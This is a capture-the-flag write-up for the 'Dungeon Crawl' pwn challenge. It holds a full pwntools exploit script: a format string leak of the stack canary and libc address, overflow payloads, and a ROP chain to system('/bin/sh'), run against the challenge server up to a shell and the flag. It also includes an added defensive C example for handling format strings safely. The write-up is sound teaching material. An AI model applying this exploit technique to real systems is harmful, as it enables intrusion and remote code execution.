
## === Dungeon Crawl (Pwn: 49 solves / 490 pts) ===

I checked the 100 actions one by one at level 4.
A segmentation fault occurred at the 73rd action.

```
ubuntu:~/Pwn_Dungeon_Crawl$ ./level4
----- LEVEL 4 -----
Choose an action: 73
Hey traveler, what is your name? 1
Running action 73...
Segmentation fault (core dumped)
```

In level 5, I read the canary value via the FSB (format string bug).
In the same way, I read a function address from the GOT and obtained the base address of libc.
```
ubuntu:~/Pwn_Dungeon_Crawl$ ./level5
----- LEVEL 5 -----
This is your final task - defeat this level and you will be rewarded.
Choose your path to victory...

Choice [0 exit][1 small][2 large][3 format]: 3
Path 3 - The possibilities are endless!
%71$p
0xfa6856f27f8d8d00
Still alive?
```
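The `%71$p` input above only works because the program hands user input to `printf` as the format string, as in `printf(user)`. The C below is an added example, not the challenge's source (which this write-up does not show): it classifies the directives in an untrusted string and echoes it through a fixed `"%s"` format instead. `scan_format`, `echo_safe` and the sample strings are hypothetical names and constructed inputs.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Counts of printf directives found in one untrusted string. */
struct fmt_scan {
    int directives;  /* conversions other than the literal "%%" */
    int positional;  /* directives using the "%N$" argument selector */
    int writes;      /* "%n": stores a count through a pointer argument */
};

/* Walk the string the way printf would and classify each directive. */
static struct fmt_scan scan_format(const char *s)
{
    struct fmt_scan r = {0, 0, 0};
    while ((s = strchr(s, '%')) != NULL) {
        s++;
        if (*s == '%') { s++; continue; }              /* escaped percent */
        const char *p = s;
        while (isdigit((unsigned char)*p)) p++;
        int pos = (p > s && *p == '$');                /* e.g. "71$" */
        if (pos) s = p + 1;
        while (*s && strchr("-+ #0'", *s)) s++;        /* flags */
        while (isdigit((unsigned char)*s) || *s == '*' || *s == '.') s++;
        while (*s && strchr("hlLqjzt", *s)) s++;       /* length modifiers */
        if (*s == '\0') break;                         /* dangling '%' */
        r.directives++;
        r.positional += pos;
        r.writes += (*s == 'n');
        s++;
    }
    return r;
}

/* Hardened echo: untrusted bytes are the argument of a fixed "%s" format. */
static int echo_safe(char *out, size_t n, const char *user)
{
    return snprintf(out, n, "%s", user);
}

int main(void)
{
    const char *samples[] = { "Gandalf", "%71$p", "100%% sure" }; /* constructed */
    char out[64];
    for (size_t i = 0; i < sizeof samples / sizeof *samples; i++) {
        struct fmt_scan r = scan_format(samples[i]);
        echo_safe(out, sizeof out, samples[i]);
        printf("%-12s directives=%d positional=%d\n", out, r.directives, r.positional);
    }
}
```

Compiling with `-Wformat -Wformat-security` makes GCC and Clang warn about a non-literal format string with no arguments, which catches the vulnerable call at build time.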

```
from pwn import *

#context(os='linux', arch='i386')
#context.log_level = 'debug'

BINARY = './level1'

if len(sys.argv) > 1 and sys.argv[1] == 'r':
    s = remote("chal1.swampctf.com", 1337)
    libc = ELF('./libc.so.6')
else:
    s = process(BINARY)
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

#
# level1
#
s.recvuntil("Access token please: ")
s.sendline("252534")

#
# level2
#
s.recvuntil("What is your party name? ")
s.sendline("A"*124+p32(0xCC07C9))

#
# level3
#
s.recvuntil("what is your favorite spell? ")
s.sendline("A"*136+"-")

#
# level4
#
s.recvuntil("Choose an action: ")
s.sendline("73")

s.recvuntil("what is your name? ")
s.sendline("A"*108+p32(0x804a47c))

#
# level5
#

elf = ELF('./level5')
puts_plt_addr = elf.plt['puts']
puts_got_addr = elf.got['puts']
pop_rdi_ret_addr = 0x400b73 # pop rdi ; ret ; (1 found)

puts_offset_addr = libc.symbols['puts']
system_offset_addr = libc.symbols['system']
binsh_offset_addr = next(libc.search('/bin/sh'))

s.recvuntil("[3 format]: ")
s.sendline("3")

s.recvuntil("endless!\n")
s.sendline("%71$p")
r = s.recv(18)
canary = int(r[2:], 16)
print "canary =", hex(canary)

s.recvuntil("[3 format]: ")
s.sendline("3")

s.recvuntil("endless!\n")
s.sendline("%7$sAAAA" + p64(puts_got_addr))
r = s.recv(6)
puts_addr = u64(r[0:6] + "\x00\x00")
libc_base_addr = puts_addr - puts_offset_addr
system_addr = libc_base_addr + system_offset_addr
binsh_addr = libc_base_addr + binsh_offset_addr
print "puts_addr =", hex(puts_addr)
print "libc_base_addr =", hex(libc_base_addr)
print "system_addr =", hex(system_addr)
print "binsh_addr =", hex(binsh_addr)

s.recvuntil("[3 format]: ")
s.sendline("1")
s.recvuntil("challenge :)\n")
buf = "A"*0x18
buf += p64(canary)
buf += "B"*8
buf += p64(pop_rdi_ret_addr)
buf += p64(binsh_addr)
buf += p64(system_addr)
s.sendline(buf)

s.interactive()
```

```
ubuntu:~/Pwn_Dungeon_Crawl$ python exploit.py r
[+] Opening connection to chal1.swampctf.com on port 1337: Done
[*] '/Pwn_Dungeon_Crawl/libc.so.6'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[*] '/Pwn_Dungeon_Crawl/level5'
    Arch:     amd64-64-little
    RELRO:    No RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
canary = 0x10867b61bc595400
puts_addr = 0x7ff90414f690
libc_base_addr = 0x7ff9040e0000
system_addr = 0x7ff904125390
binsh_addr = 0x7ff90426cd57
[*] Switching to interactive mode
$ id
uid=1000(ctf) gid=1000(ctf) groups=1000(ctf)
$ ls
flag
level1
level2
level3
level4
level5
$ cat flag
flag{I_SurV1v3d_th3_f1n4l_b0ss}
```